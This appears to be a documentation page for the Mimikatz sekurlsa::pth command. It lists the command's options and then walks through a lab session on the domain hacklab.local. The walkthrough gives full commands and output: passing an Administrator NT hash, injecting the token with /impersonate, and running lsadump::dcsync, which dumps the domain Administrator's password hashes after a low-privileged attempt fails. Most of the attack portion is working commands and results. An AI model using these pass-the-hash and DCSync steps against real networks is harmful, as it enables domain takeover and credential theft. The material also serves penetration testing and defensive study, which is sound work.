pth
sekurlsa::pth performs Pass-the-Hash, Pass-the-Key and Over-Pass-the-Hash. Upon successful authentication, a program is run (cmd.exe by default). It has the following command line arguments:
  • /user : the username to impersonate. Note that Administrator is not the only possible name for this well-known account (it can be renamed).
  • /domain : the fully qualified domain name. If Active Directory Domain Services are not in use, or for a local user/admin account, a computer name, a server name or a workgroup name can be used instead.
  • /rc4 or /ntlm : the RC4 key / NT hash (derived from the user's password).
  • /aes128 : the AES128 key derived from the user's password and the realm of the domain.
  • /aes256 : the AES256 key derived from the user's password and the realm of the domain.
  • /run : the command line to run (cmd.exe by default).
  • /luid : locally unique identifier. According to Microsoft, a locally unique identifier (LUID) is a 64-bit value guaranteed to be unique only on the system on which it was generated, and only until that system is restarted.
  • /impersonate : performs user token impersonation. Note that no new process is spawned: the token is injected into the process running Mimikatz.
LM and NT hashes are used to authenticate accounts with the NTLM protocol. Both are often loosely called the "NTLM hash", and much documentation, many blog posts and many tools mix the terms. Here, "ntlm" refers to the NT hash.
Performing Pass-the-Hash with this command requires elevated privileges on the Windows system: either run privilege::debug beforehand or execute Mimikatz as the NT AUTHORITY\SYSTEM account. This does not apply to Pass-the-Ticket, which uses an official API.
mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7
user    : Administrator
domain  : hacklab.local
program : cmd.exe
impers. : no
NTLM    : b09a14d2d325026f8986d4a874fbcbc7
  |  PID  5896
  |  TID  4620
  |  LSA Process is now R/W
  |  LUID 0 ; 82772120 (00000000:04ef0098)
  \_ msv1_0   - data copy @ 0000023A0E8BD5C0 : OK !
  \_ kerberos - data copy @ 0000023A0E9FF5A8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000023A0E941CE8 (32) -> null
Pass the Hash

With token impersonation

As the following output shows, hacklab\optimus is a low-privileged user in the HACKLAB.LOCAL Active Directory domain:
C:\Users\optimus>net user optimus /domain
The request will be processed at a domain controller for domain hacklab.local.

User name                    optimus
Full Name                    optimus prime
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            18/10/2021 15:39:30
Password expires             Never
Password changeable          19/10/2021 15:39:30
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   18/10/2021 15:56:39

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.
An attempt to DCSync with this user's credentials fails with the following error:
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'hacklab.local' will be the domain
[DC] 'DC.hacklab.local' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
However, with the /impersonate option, DCSync can then be performed from the same Mimikatz process without spawning a new window:
mimikatz # sekurlsa::pth /user:Administrator /domain:hacklab.local /ntlm:b09a14d2d325026f8986d4a874fbcbc7 /impersonate
user    : Administrator
domain  : hacklab.local
program : C:\Users\Public\x64\mimikatz.exe
impers. : yes
NTLM    : b09a14d2d325026f8986d4a874fbcbc7
  |  PID  7368
  |  TID  3204
  |  LSA Process is now R/W
  |  LUID 0 ; 86889532 (00000000:052dd43c)
  \_ msv1_0   - data copy @ 0000023A0E8BD7B0 : OK !
  \_ kerberos - data copy @ 0000023A0E9FE8E8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000023A0E96C0E8 (32) -> null
** Token Impersonation **
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'hacklab.local' will be the domain
[DC] 'DC.hacklab.local' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   : 01/01/1601 01:00:00
Password last change : 24/09/2021 16:24:41
Object Security ID   : S-1-5-21-2725560159-1428537199-2260736313-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7
    ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7
    ntlm- 1: a06b19f88e0432e937a67fb6848e56bd

...Output Omitted...
According to Benjamin (Mimikatz's author), the following must be taken into consideration:
  • This command does not work with minidumps (nonsense).
  • This new version of 'Pass-The-Hash' replaces the RC4 keys of Kerberos with the NT hash (and/or replaces the AES keys). It allows the Kerberos provider to request TGT tickets.
  • The NT hash is mandatory on XP/2003/Vista/2008, and on 7/2008r2/8/2012 before kb2871997 (AES not available or replaceable).
  • AES keys can be replaced only on 8.1/2012r2, or on 7/2008r2/8/2012 with kb2871997; in this case an NT hash is not required.